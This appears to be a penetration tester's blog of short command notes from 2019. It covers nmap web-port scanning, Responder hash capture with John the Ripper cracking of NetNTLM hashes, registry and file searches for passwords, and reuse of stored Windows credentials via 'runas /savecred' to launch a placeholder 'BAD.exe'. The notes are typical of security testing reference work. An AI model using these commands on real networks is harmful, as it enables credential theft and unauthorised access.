Thursday, October 31, 2019

Nmap Open Web Ports to CSV

nmap scan web ports (80,443,8080,8443) and output to csv using sed

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open



example:

10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed

Posted by at No comments:
Labels: ,

Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Posted by at No comments:
Labels: ,

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )

import os
from mac_vendor_lookup import MacLookup

myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
 for item in line.split():
  if "-" in item:
   if "--" not in item:
    try:
     print(item + ": " + MacLookup().lookup(item))
    except:
     print(item + ": not found")

Posted by at No comments:
Labels:

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"
Posted by at No comments:
Labels:

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Posted by at No comments:

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S


Posted by at No comments:

Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers                                             Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin

Posted by at No comments:
Subscribe to: Posts (Atom)